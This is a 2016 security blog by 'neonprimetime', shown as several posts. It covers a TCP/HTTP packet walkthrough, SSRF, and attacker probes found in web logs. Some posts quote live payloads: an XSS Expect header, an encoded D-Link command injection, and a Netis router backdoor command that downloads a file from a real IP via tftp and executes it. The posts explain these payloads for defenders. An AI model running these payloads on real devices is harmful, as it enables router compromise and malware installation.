1.) You see a SYN from the client (10.8.8.101, flag 0x0002) saying 'hey server i want to talk to you'. The Seq and Ack #s are not used yet. The Total packet is 66 bytes. The ethernet header is always 14, thus the remainder (66-14 = 52) is IP Total Length is 52. Since the IP header is 20 that leaves (52-20 = 32) left for TCP packet. Since the TCP packet only contains a header of 32, that means that there is no tcp payload in this packet (32-32=0) which makes sense since it's the initial SYN.

2.) The server responds with a SYN-ACK (108.60.15.36, flag 0x0012) saying 'hey client i received your syn'. The Seq # is still not used yet, but the Ack # is incremented to 1 because the prior received packet contained a SYN. The Total packet is 60 bytes. There are 14 for ethernet again so 60-14=46 for IP. But notice the IP total header says 44. That means that the remaining 46-44=2 bytes are just 0 padding because the Ethernet frame has a minimum size it must be. Since the IP header is 20 and the we know (44-20=24) is the size of the TCP packet. Since the TCP header takes up all of the tcp packet (24-24=0) we again have no tcp payload.

3.) The client then response with an ACK (flag 0x0010) saying 'hey server i got your syn-ack, lets start talking'. The Seq # is now increased by 1 because of the prior received packet containing a SYN. The Ack # stays untouched at 1 right now. The Total packet is 60 bytes (14 for ethernet, 44 for ip frame). Since the IP header is 20 and the we know (44-20=24) is the size of the TCP packet. Since the TCP header takes up all of the tcp packet (24-24=0) we again have no tcp payload.





The next several packets are the actual application layer HTTP GET request.

4.) You see that application layer traffic starting now that the TCP handshake is complete. This is an HTTP GET request, so the client requesting a web page from the server. It is a PSH/ACK (flag 0x0018), all packets go forward during normal communication with contain an ACK, and the PSH is to indicate that the client is ready for data. The Seq # and Ack # both stay at 1 for this initial request since no data was actually transferred yet. You'll notice the total packet is 408 bytes this time though. The Ethernet Header is 14 and the IP total length is 408-14=394. Then in the IP packet the header is 20 meaning the rest of it (the tcp packet) is 394-20=374. And in the TCP packet the tcp header is 20 meaning the tcp payload (which in this case is an HTTP GET is 374-20=354 bytes). If you were to look in the Packet Bytes in wireshark for this packet you'd see actual HTTP Request Headers like the host host, useragent, etc.

5.) This next packet is the Server simply Acknowledging that it received the HTTP GET request. Notice it's an ACK (0x0010) for acknowledgement. Also notice the total length is small again, only 60 bytes. Take out the 14 byte ethernet header and you get 60-14=46 bytes for rest of IP. But notice again it says the total IP length is only 40 so that means 46-40=6 bytes of zero padding has been added to the end to fill out the Ethernet frame. Take out the 20 byte IP header and you get 40-20=20 bytes for TCP. Take out the TCP header and you get 20-20=0 bytes of actual TCP payload. There is none since this is just the acknowledgement. Notice the Sequence # stayed at 1, but the Ack # actually increased. If you recall from the previous packet we said the TCP total length was 354. Thus the Acknowledgement # because 1+354=355 because it's the server saying 'hi client, i acknowledge I have now received a total of 355 bytes from you'.

6.) Next you'll see the web server continue with it's 2nd packet in a row ... actually responding back to the client's GET request with some data, so it's going to get interesting now. See how the total length is 1514 bytes. Take out the 14 byte ethernet header and you get 1514-14=1500 bytes of IP. Take out the 20 byte IP header and you get 1500-20=1480 bytes of TCP. Take out the 20 bytes of TCP Header and you get 1480-20=1460 bytes of TCP payload (or in this case actual HTML code getting returned by the web server in response to the HTTP GET request for a specific page). If you were to look in the packet bytes of wireshark for this packet you'd see actual HTML code like the HTTP Response headers and perhaps an HTML or BODY tag eventually here soon. Now notice that the Ack # stayed at 355 because the Server has not received any more data from the client and the Seq # stays at 1 because no data has actually been received by the client prior to this packet yet.

7.) Next it's a kinda interesting normal occurence in TCP. The Server (108.60.15.36) had received the HTTP GET request prior and now is ready to start firing off packets back to the client in small chunks in order to send back the entire large HTTP response. The server isn't necessarily going to wait for the client to Acknowledge every packet, but instead the Server is going to start firing off a bunch of packets. Thus in the case we are going to see the server send 2 packets of http data before the client even Acknowledges it received some (in packet #8). This thus is similar to packet #6. It's a PSH/ACK with data (0x0018) the ACK because there is data in this payload and the PSH because the Server is saying he's ready to receive data from the client. The total length of the packet is 1308. If you remove the 14 for the ethernet header then 1308-14=1294 for IP. Then the IP header is 20 so 1294-20=1274 bytes for the TCP. Then take away the 20 bytes TCP header then 1274-20=1254 bytes for the TCP payload (which is more HTML code in the HTTP response). So you can see that the Ack # stays at 355 because the data received by the server has not changed, but the SEq # has increased to 1+1460=1461 bytes as the server is saying 'hey client i've now sent you 1461 bytes of data'.

8.) So this is the client finally sending an ACK (0x0010) back to the server saying 'hello server i acknowledge i received your first 2 packets of data'. You'll notice the total length is small at 60 bytes again because this is just an ACK. The Ethernet header is 14 so 60-14=46 again for IP. But since it says the IP total length is only 40, then we get 46-40=6 bytes of zero padding for the Ethernet header minimum size. Then again the ip header is 20 so 40-20=20 bytes remaining for TCP. And the TCP header is 20 so 20-20=0 bytes for the actual tcp payload which makes sense again since this is just the tiny quick Acknowledgment packet. The Seq # is set to 355 because the client is saying 'hi server just so you know I have sent 355 bytes if tcp payload to you so far'. The Ack # is now pretty large at 1+1460+1254=2715 bytes of TCP payload, saying 'hi server i have so far receiving 2715 bytes of tcp payload from you.'

9-360.) Packets 9 thru 360 are a repeat of 6 thru 8 over and over again. The server sends 1 or 2 packets of data. The client Acknowledges the data it received. Each time the client's Ack # keeps increasing by the # of TCP payload bytes it received so that it's telling the server 'hey i have so far received X # of bytes from you successfully.' And the server's Seq # keeps increasing by the # of TCP payload bytes it sent so that it's telling the client 'he i have so far sent Y # of bytes to you.'





361.) Now in Wireshark packet #361 looks different because it says HTTP/1.1 200 OK. But you'll notice from the wireshark snippet above that Wireshark is just being smart and "re-assembling" all the TCP (HTTP Response) payloads together to give you an easy to read understanding of the HTTP Response which in this case was a 200 success meaning everybody was happy. This particular packet is actually otherwise essentially the same as packet #7 for example as it's just more TCP payload data (HTTP Response) with a PSH/ACK flag. The only difference is that this is the "last one" in the sequence. Note in this packet that it's 1001 total bytes. If we take out the 14 byte ethernet header there's 1001-14=987 bytes for IP. Take out the 20 bytes IP header and we have 987-20=967 bytes for TCP . Take out the 20 byte tcp header and we have 967-20=947 bytes of tcp payload (the final portion of the HTTP Response). You'll notice the ack # is still 355 because the server is saying 'hey client just so you know i've still only received 355 bytes from you' but you'll notice the Seq # is now huge at 280900 because the server is saying 'hey client i have now sent you a total of 280900 bytes.'

362.) This next packet is nearly identical to what we described in packet #8. It's the client's Acknowledgement of the Server sending data again. Notice the Seq # is still 355 saying 'hey server i have sent you 355 bytes so far' and the Ack # is 280900 saying 'hey server i have received 280900 bytes from you so far successfully'. This is actually the acknowlegement of packet #360 (not #361).

363.) This packet is the acknowledgment of the final server packet #361. You can tell because the Ack # has jumped to 280900+947=281847 bytes of total TCP payloads thus the client saying 'hey server i have received successfully now 281847 bytes of tcp payload from you.'

364.) Finally we get to a graceful teardown. The server sends a FIN/PSH/ACK (0x0019) basically telling the client, I have nothing more to send to you (FIN), I'm ready for data back from you now (PSH). Notice the server has a Seq # of 281847 because it's saying 'hey client i have sent you 281847 bytes of tcp payload data now' and the ack # is still 355 because it's saying 'hey client i have still only received 355 bytes of tcp payload data from you'. The packet is a small one again because it's just a teardown. 60 bytes total, take away 14 for the ethernet header leaves 60-14=46 for IP. But since the IP total length only says 40 then 46-40=6 bytes of zero padding in the ethernet header again. Then 20 bytes for the ip header leaves us with 40-20=20 bytes for the tcp packet. And 20 bytes of tcp header means there are 20-20=0 bytes of tcp payload in this.

365.) The client now acknolwedges (ACK 0x0010) that the FIN teardown request was received. Since the prior packet contained a FIN the ack # increases by 1 to 1+281847=281848.

398.) Now notice the gap in wireshark # (365 to 398) , this is because there is a larger time delay between the last packet and this one. This is basically the client finishing up whatever it was doing and saying ok I have nothing more to send you (FIN) either.

399.) Finally the server Acknolwedges the client's request to teardown (FIN). Notice since the prior packet request contained a FIN then the Ack # increases to 1+355=356. The conversation is done.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Thursday, August 11, 2016

Don't Ignore Adware and Click Fraud Alerts

Good article on why we should take adware and click fraud seriously and re-image workstations.

"People think of adware and click-fraud as a stupid type of threat,” Barak said. But what security experts need to consider is, most of the malware today can provide complete remote access. "

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Risks of Linux Support in Windows 10

Threatpost had a thought provoking article on WINDOWS 10 ATTACK SURFACE GROWS WITH LINUX SUPPORT IN ANNIVERSARY UPDATE. Since Windows 10 will now have Linux support, it could make for some interesting vulnerabilities that show up. If you're a Windows Administrator, you could have to start dealing with and paying attention to Linux patches and vulnerabilities also because if this feature is enabled you may have some things that start impacting you. It's also an interesting thought that some endpoint protection agents may be purposely only looking for Windows IoCs on windows machines and Linux IoCs on linux machines, but now the endpoint agents will have to take into account the fact that both Linux and Windows binaries could be running in the windows environment. Definitely something to keep an eye on and don't forget about.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

vBulletin SSRF Server-Side Request Forgery

An interesting article on a vBulletin SSRF vulnerability. Acunetix describes SSRF (Server-Side Request Forgery) nicely.

Think of it this way, with an SSRF request, you can make requests "on-behalf" of the vulnerable server!

Thus the primary target of an SSRF request if an internal system that you normally wouldn't have access to, but since you can make requests "on-behalf" of the vulnerable server, since that vulnerable server has access to an internal system, you now can make a request to that other internal system. As an example you could
1.) Make SSRF attack request to internet facing Web Server X
2.) If vulnerable, Web Server X would turn around and run your scan/exploit attack against internal non-internet facing Application Server Y


Now the attack you run could vary from this like ...
- Recon (where you try to enumerate all the internal non-accessible devices)
- Scans (where you try identify vulnerabilities that exist on an internal non-accessible device)
- Exploit (where you try to exploit a vulnerabilty and compromise an internal non-accessible device)


All of those requests would come on behalf of the vulnerable server so it would appear as if the vulnerable web server is making the requests when in actuality the external attacker is making the requests.

For this particular vBulletin vulnerability, it can be mitigated by applying the appropriate patches.

At a higher level, to minimize the damage of an SSRF vulnerabilty in your environment, make sure you're applying network segmentation, firewall rules, ip filtering, least privilege, etc. so that even if the attacker finds an SSRF vulnerability and starts making requests on behalf of your vulnerable server, the attacker can only access, scan, and exploit the devices that the vulnerable server has access to ... which hopefully is a small subset of your actual internal environment.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Tuesday, August 9, 2016

Web Log Mini-Posts from August 9, 2016

Couple of mini-posts on random web logs

1-SAP recon
2-Old Apache XSS
3-Old Print Server vuln
4-Old DLink Router injection
5-Old Linksys Router injection


More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

HEAD /irj/portal request

HEAD /irj/portal HTTP/1.0

Saw this in the logs, wondered what it was? It appears it's a common probe that an attacker does if they're trying to discover websites running SAP Java Engine. SAP is an ERP (enterprise resource planning) software. Perhaps they know of a vulnerability or attack on SAP and are trying to discover those sites.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Expect: alert(document.domain)

GET / HTTP/1.1
Expect: <script>alert(document.domain)</script>


Saw this request in some web logs, what is it? Appears to be a super old XSS (cross site scripting) vulnerability on Apache based web servers from like back in 2006. The attacker is thus looking to see if he can find super old servers that were never patched. The javascript alert method will create a popup box in the browser, and the document.domain variable will print out the current domain (beginning part of the url) that the page is on if vulnerable.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

stssys.htm wget request

GET /stssys.htm HTTP/1.0
User-Agent: Wget(linux)


Saw this request in the http logs, what could it be? It appears in 2013 TRENDnet Print Server vulnerability that allowed an attacker to reset the printer to factory defaults which would then allow them to set the new IP address. This could be done remotely without authentication by acccessing particular web pages. This attacker is just using the linux wget command to scan the internet and look for vulnerable print servers.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

command.php wget HTTP Post

POST /command.php HTTP/1.0
User-Agent: Wget(linux)

cmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74


I saw this http request in the logs and wondered what it was? Turns out the sometime in 2013 a D-Link® Wireless Router contained and OS command injection vulnerability on a web administrative page. So this attacker is looking for that vulnerable page and running a command.

I decoded the cmd paramter to find that it runs this command.

cd /var/tmp && echo -ne \\x3610cker > 610cker.txt && cat 610cker.txt

The attacker is simply going into the temp folder, creating a text file with some text in it and printing out the text file. If that works then the attacker knows the router is vulnerable and he'll come back to do more damage.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

hndUnblock.cgi wget calls

GET /hndUnblock.cgi HTTP/1.0
User-Agent: Wget(linux)


Saw this http request in the logs, what could it mean? It appears that in April 2014 there was a Linksys router vulnerability. The web admin page on routers provides the hndUnblock.cgi page to administrate. This page could be accessed by and attacker it apparently contains an OS command injection vulnerability that allows execution of commands against the router. So this attacker is simply running an automated linux script that calls the wget command and is looking to see if the vulnerable hndUnblock.cgi page exists.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Friday, August 5, 2016

Netis Router Backdoor UDP 53413

I saw this SANS Internet Storm Center post about Netis Router Backdoor exploit attempts. Thought it'd be interesting to take a quick look at one of them. It's a raw UDP packet sent to port 53413 with a shell command to be executed. Looks very similar to all those Shellshock attempts you continue to see in your logs.

cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.

So first ...

cd /tmp || cd /var/ || cd /dev/;

The first thing the attacker tries it to move into a directory where he likely has read/write permissions. Thus he uses the double-pipe (||) to so that if the first command fails, the second command is executed, and if that one fails, the third is executed. Thus it's essentially an if this command works do it, otherwise try the next, otherwise try the next. So he sees if he has permission to move into the /tmp folder or the /var folder or the /dev folder. If he moves into any of those folders then he's ready to execute the more interesting commands.

Then

busybox tftp -r min -g 91.134.141.49;

Next the user is taking advantage of busybox, which is a tool that is on many embedded linux devices (likely the Netis Router that is exploitable) and this tool has many basic linux commands/functions such as tftp.

tftp [OPTIONS] HOST [PORT]

Transfer a file from/to tftp server

Options:

   -r FILE Remote FILE
   -g Get file


So the attacker is using the tftp command to get a remote file called 'min', in this case from the server at 91.134.141.49 and save it to the current directory (again this could be /tmp, /var, or /dev depending on the first command excecuted).

Then

cp /bin/sh .;

Next the user makes a copy of the shell executable to the current directory (again this could be /tmp, /var, or /dev depending on the first command excecuted).

Then

cat min >sh;

Next the attacker appears to concatenate the contents of the downloaded file to the end of the sh executable, thus when the sh executable is run it will run not only the standard commands but also the ones the attacker appended to it.

Then

chmod 777 sh;

Then the sh permissions are changed so that the attacker is able to execute them.

Then

./sh.

Finally the attacker executes the sh executable which includes his downloaded payload and your server is likely now compromised.

To prevent this I'm not sure that I've seen anything about Netis actually patching it so you probably need some sort of IPS (Intrusion Prevention System) that has a signature match that can block this type of traffic.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.